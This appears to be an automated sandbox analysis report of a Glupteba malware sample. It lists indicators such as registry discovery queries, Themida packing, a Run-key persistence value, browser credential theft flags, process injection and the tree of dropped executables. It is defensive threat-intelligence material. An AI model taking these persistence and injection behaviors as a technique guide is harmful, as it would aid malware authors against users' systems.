glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1E33JDGNbjmZzxf2Q6x5i6qe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1E33JDGNbjmZzxf2Q6x5i6qe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UrFDEupTAq4XHBLoKrB5f2Vt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UrFDEupTAq4XHBLoKrB5f2Vt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ON4L5bHszVasHkwSax9rAiBb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ON4L5bHszVasHkwSax9rAiBb.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (14).exe

Loads dropped DLL 3 IoCs

pid	Process
4180	cmd.exe
4180	cmd.exe
2356	ubaATb0PJHxnq6d65ECsPkzE.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral12/files/0x000100000001ab94-154.dat	themida
behavioral12/files/0x000100000001ab86-129.dat	themida
behavioral12/files/0x000100000001ab92-128.dat	themida
behavioral12/files/0x000100000001ab86-162.dat	themida
behavioral12/files/0x000100000001ab92-160.dat	themida
behavioral12/files/0x000100000001ab94-182.dat	themida
behavioral12/memory/820-248-0x0000000000970000-0x0000000000971000-memory.dmp	themida
behavioral12/memory/1236-256-0x0000000000190000-0x0000000000191000-memory.dmp	themida
behavioral12/memory/516-267-0x00000000001F0000-0x00000000001F1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2066455.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UrFDEupTAq4XHBLoKrB5f2Vt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ON4L5bHszVasHkwSax9rAiBb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1E33JDGNbjmZzxf2Q6x5i6qe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
527	ipinfo.io
116	ip-api.com
122	ipinfo.io
123	ipinfo.io
140	api.db-ip.com
142	api.db-ip.com
1936	ipinfo.io
29	ipinfo.io
30	ipinfo.io
119	ipinfo.io
126	ipinfo.io
1935	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
820	1E33JDGNbjmZzxf2Q6x5i6qe.exe
1236	UrFDEupTAq4XHBLoKrB5f2Vt.exe
516	ON4L5bHszVasHkwSax9rAiBb.exe

Suspicious use of SetThreadContext 39 IoCs

description	pid	Process	procid_target
PID 600 set thread context of 4692	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	117
PID 3276 set thread context of 4744	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	119
PID 3584 set thread context of 4888	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	120
PID 2536 set thread context of 4988	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	175
PID 600 set thread context of 5020	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	121
PID 3276 set thread context of 5108	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	128
PID 3184 set thread context of 4164	3184	f5_UmgjsIjulvakrY8mXuzA0.exe	125
PID 3584 set thread context of 4172	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	123
PID 2536 set thread context of 4528	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	124
PID 600 set thread context of 4600	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	126
PID 3584 set thread context of 4960	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	130
PID 3276 set thread context of 2872	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	129
PID 2536 set thread context of 3916	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	134
PID 600 set thread context of 4368	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	135
PID 3584 set thread context of 3992	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	143
PID 3276 set thread context of 2892	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	144
PID 2536 set thread context of 5276	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	147
PID 600 set thread context of 5316	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	146
PID 3584 set thread context of 5472	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	148
PID 3276 set thread context of 5532	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	149
PID 2536 set thread context of 5740	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	152
PID 3584 set thread context of 5988	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	158
PID 3276 set thread context of 6128	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	159
PID 3584 set thread context of 5820	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	170
PID 3276 set thread context of 6020	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	171
PID 600 set thread context of 504	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	174
PID 2536 set thread context of 5284	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	172
PID 3584 set thread context of 4988	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	175
PID 3276 set thread context of 1856	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	177
PID 600 set thread context of 3940	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	178
PID 2536 set thread context of 5584	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	179
PID 3584 set thread context of 1572	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	181
PID 3276 set thread context of 4044	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	186
PID 600 set thread context of 5580	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	184
PID 2536 set thread context of 2104	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	185
PID 3584 set thread context of 4356	3584	hSGnSCPD7b17YIidPAVMlaPN.exe	187
PID 600 set thread context of 6012	600	8kpa_geWtSVxKnVMOAjSSqfZ.exe	189
PID 2536 set thread context of 5892	2536	vT8ZMdGaJj7ECtpojGTTpGKj.exe	193
PID 3276 set thread context of 5492	3276	gyeTTeQMk7okn3MLzvlxWIav.exe	190

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	0dD0klVfoNE_874NGwzH3wSa.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	gyeTTeQMk7okn3MLzvlxWIav.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	0dD0klVfoNE_874NGwzH3wSa.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	0dD0klVfoNE_874NGwzH3wSa.exe
File created	C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	0dD0klVfoNE_874NGwzH3wSa.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	gyeTTeQMk7okn3MLzvlxWIav.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	0dD0klVfoNE_874NGwzH3wSa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 35 IoCs

pid	pid_target	Process	procid_target
4724	2732	WerFault.exe	105
4828	4988	WerFault.exe	122
5208	2732	WerFault.exe	105
5504	3840	WerFault.exe	83
5696	2732	WerFault.exe	105
5116	3840	WerFault.exe	83
5580	2732	WerFault.exe	105
4440	3840	WerFault.exe	83
5144	1088	WerFault.exe	82
2696	3840	WerFault.exe	83
6088	1088	WerFault.exe	82
6296	1088	WerFault.exe	82
6620	3840	WerFault.exe	83
7140	2732	WerFault.exe	105
6692	6908	WerFault.exe	210
3556	3840	WerFault.exe	83
6540	2732	WerFault.exe	105
7208	1088	WerFault.exe	82
5976	1088	WerFault.exe	82
7928	3840	WerFault.exe	83
7920	2732	WerFault.exe	105
5084	8148	WerFault.exe
5908	3840	WerFault.exe	83
7916	2732	WerFault.exe	105
7508	1088	WerFault.exe	82
8108	5016	WerFault.exe	271
8428	1088	WerFault.exe	82
8492	2732	WerFault.exe	105
8700	4324	WerFault.exe	292
8644	3840	WerFault.exe	83
8548	1356	WerFault.exe	290
9144	1088	WerFault.exe	82
9708	5044	WerFault.exe	140
10580	7916	WerFault.exe	389
7916	7836	WerFault.exe	243

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f5_UmgjsIjulvakrY8mXuzA0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f5_UmgjsIjulvakrY8mXuzA0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f5_UmgjsIjulvakrY8mXuzA0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3068	schtasks.exe
3708	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6396	timeout.exe
6224	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
6948	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Process not Found

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
16500	PING.EXE

Script User-Agent 7 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	189	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	190	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	523	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	121	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	122	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	125	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	178	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3916	Setup (14).exe
3916	Setup (14).exe
4164	f5_UmgjsIjulvakrY8mXuzA0.exe
4164	f5_UmgjsIjulvakrY8mXuzA0.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
4724	WerFault.exe
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
5208	WerFault.exe
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found
3052	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4164	f5_UmgjsIjulvakrY8mXuzA0.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	816	p9W6JcXWZ8tle3dBsZW5Bta0.exe
Token: SeDebugPrivilege	204	Y5KPfNWM24nh2NlqciqtELNp.exe
Token: SeRestorePrivilege	4724	WerFault.exe
Token: SeBackupPrivilege	4724	WerFault.exe
Token: SeDebugPrivilege	4724	WerFault.exe
Token: SeDebugPrivilege	5208	WerFault.exe
Token: SeDebugPrivilege	5504	WerFault.exe
Token: SeDebugPrivilege	820	1E33JDGNbjmZzxf2Q6x5i6qe.exe
Token: SeDebugPrivilege	1236	UrFDEupTAq4XHBLoKrB5f2Vt.exe
Token: SeDebugPrivilege	5696	WerFault.exe
Token: SeDebugPrivilege	516	ON4L5bHszVasHkwSax9rAiBb.exe
Token: SeDebugPrivilege	4888	hSGnSCPD7b17YIidPAVMlaPN.exe
Token: SeDebugPrivilege	5116	WerFault.exe
Token: SeDebugPrivilege	4172	hSGnSCPD7b17YIidPAVMlaPN.exe
Token: SeDebugPrivilege	5772	1087562.exe
Token: SeDebugPrivilege	5580	8kpa_geWtSVxKnVMOAjSSqfZ.exe
Token: SeDebugPrivilege	2280	5303400.exe
Token: SeDebugPrivilege	4440	WerFault.exe
Token: SeDebugPrivilege	4960	hSGnSCPD7b17YIidPAVMlaPN.exe
Token: SeDebugPrivilege	2696	WerFault.exe
Token: SeDebugPrivilege	3992	hSGnSCPD7b17YIidPAVMlaPN.exe
Token: SeDebugPrivilege	5472	hSGnSCPD7b17YIidPAVMlaPN.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4180	cmd.exe
3052	Process not Found
3052	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3916 wrote to memory of 3912	3916	Setup (14).exe	79
PID 3916 wrote to memory of 3912	3916	Setup (14).exe	79
PID 3916 wrote to memory of 3912	3916	Setup (14).exe	79
PID 3916 wrote to memory of 820	3916	Setup (14).exe	88
PID 3916 wrote to memory of 820	3916	Setup (14).exe	88
PID 3916 wrote to memory of 820	3916	Setup (14).exe	88
PID 3916 wrote to memory of 1236	3916	Setup (14).exe	85
PID 3916 wrote to memory of 1236	3916	Setup (14).exe	85
PID 3916 wrote to memory of 1236	3916	Setup (14).exe	85
PID 3916 wrote to memory of 816	3916	Setup (14).exe	87
PID 3916 wrote to memory of 816	3916	Setup (14).exe	87
PID 3916 wrote to memory of 3840	3916	Setup (14).exe	83
PID 3916 wrote to memory of 3840	3916	Setup (14).exe	83
PID 3916 wrote to memory of 3840	3916	Setup (14).exe	83
PID 3916 wrote to memory of 3836	3916	Setup (14).exe	84
PID 3916 wrote to memory of 3836	3916	Setup (14).exe	84
PID 3916 wrote to memory of 3836	3916	Setup (14).exe	84
PID 3916 wrote to memory of 3188	3916	Setup (14).exe	86
PID 3916 wrote to memory of 3188	3916	Setup (14).exe	86
PID 3916 wrote to memory of 3188	3916	Setup (14).exe	86
PID 3916 wrote to memory of 1088	3916	Setup (14).exe	82
PID 3916 wrote to memory of 1088	3916	Setup (14).exe	82
PID 3916 wrote to memory of 1088	3916	Setup (14).exe	82
PID 3916 wrote to memory of 600	3916	Setup (14).exe	81
PID 3916 wrote to memory of 600	3916	Setup (14).exe	81
PID 3916 wrote to memory of 600	3916	Setup (14).exe	81
PID 3916 wrote to memory of 2460	3916	Setup (14).exe	80
PID 3916 wrote to memory of 2460	3916	Setup (14).exe	80
PID 3916 wrote to memory of 2460	3916	Setup (14).exe	80
PID 3916 wrote to memory of 2536	3916	Setup (14).exe	89
PID 3916 wrote to memory of 2536	3916	Setup (14).exe	89
PID 3916 wrote to memory of 2536	3916	Setup (14).exe	89
PID 3916 wrote to memory of 2836	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	95
PID 3916 wrote to memory of 2836	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	95
PID 3916 wrote to memory of 2836	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	95
PID 3916 wrote to memory of 1864	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	90
PID 3916 wrote to memory of 1864	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	90
PID 3916 wrote to memory of 204	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	102
PID 3916 wrote to memory of 204	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	102
PID 3916 wrote to memory of 516	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	97
PID 3916 wrote to memory of 516	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	97
PID 3916 wrote to memory of 516	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	97
PID 3916 wrote to memory of 4044	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	186
PID 3916 wrote to memory of 4044	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	186
PID 3916 wrote to memory of 4044	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	186
PID 3916 wrote to memory of 2356	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	101
PID 3916 wrote to memory of 2356	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	101
PID 3916 wrote to memory of 2356	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	101
PID 3916 wrote to memory of 3276	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	100
PID 3916 wrote to memory of 3276	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	100
PID 3916 wrote to memory of 3276	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	100
PID 3916 wrote to memory of 3184	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	108
PID 3916 wrote to memory of 3184	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	108
PID 3916 wrote to memory of 3184	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	108
PID 3916 wrote to memory of 3564	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	106
PID 3916 wrote to memory of 3564	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	106
PID 3916 wrote to memory of 3564	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	106
PID 3916 wrote to memory of 2732	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	105
PID 3916 wrote to memory of 2732	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	105
PID 3916 wrote to memory of 2732	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	105
PID 3916 wrote to memory of 3776	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	104
PID 3916 wrote to memory of 3776	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	104
PID 3916 wrote to memory of 3776	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	104
PID 3916 wrote to memory of 3584	3916	vT8ZMdGaJj7ECtpojGTTpGKj.exe	103

C:\Users\Admin\AppData\Local\Temp\Setup (14).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3916
- C:\Users\Admin\Documents\yyq9STlBUyK2aI0IBD_qRNHR.exe
  "C:\Users\Admin\Documents\yyq9STlBUyK2aI0IBD_qRNHR.exe"
  2⤵
  - Executes dropped EXE
  PID:3912
- - C:\Users\Admin\Documents\yyq9STlBUyK2aI0IBD_qRNHR.exe
    "C:\Users\Admin\Documents\yyq9STlBUyK2aI0IBD_qRNHR.exe" -u
    3⤵
    - Executes dropped EXE
    PID:2276
- C:\Users\Admin\Documents\0dD0klVfoNE_874NGwzH3wSa.exe
  "C:\Users\Admin\Documents\0dD0klVfoNE_874NGwzH3wSa.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2460
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    PID:4168
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4276
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    PID:4336
- C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
  "C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:600
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:4692
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:5020
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:4600
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:4368
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:5316
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:5804
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Executes dropped EXE
    PID:5400
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:504
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:3940
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5580
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6012
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6796
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:2136
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6716
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6908
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7232
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7648
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8004
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:4560
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8060
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6920
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:4324
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:1812
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7344
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8288
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8788
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9164
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8508
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7268
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9180
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9096
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9244
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9984
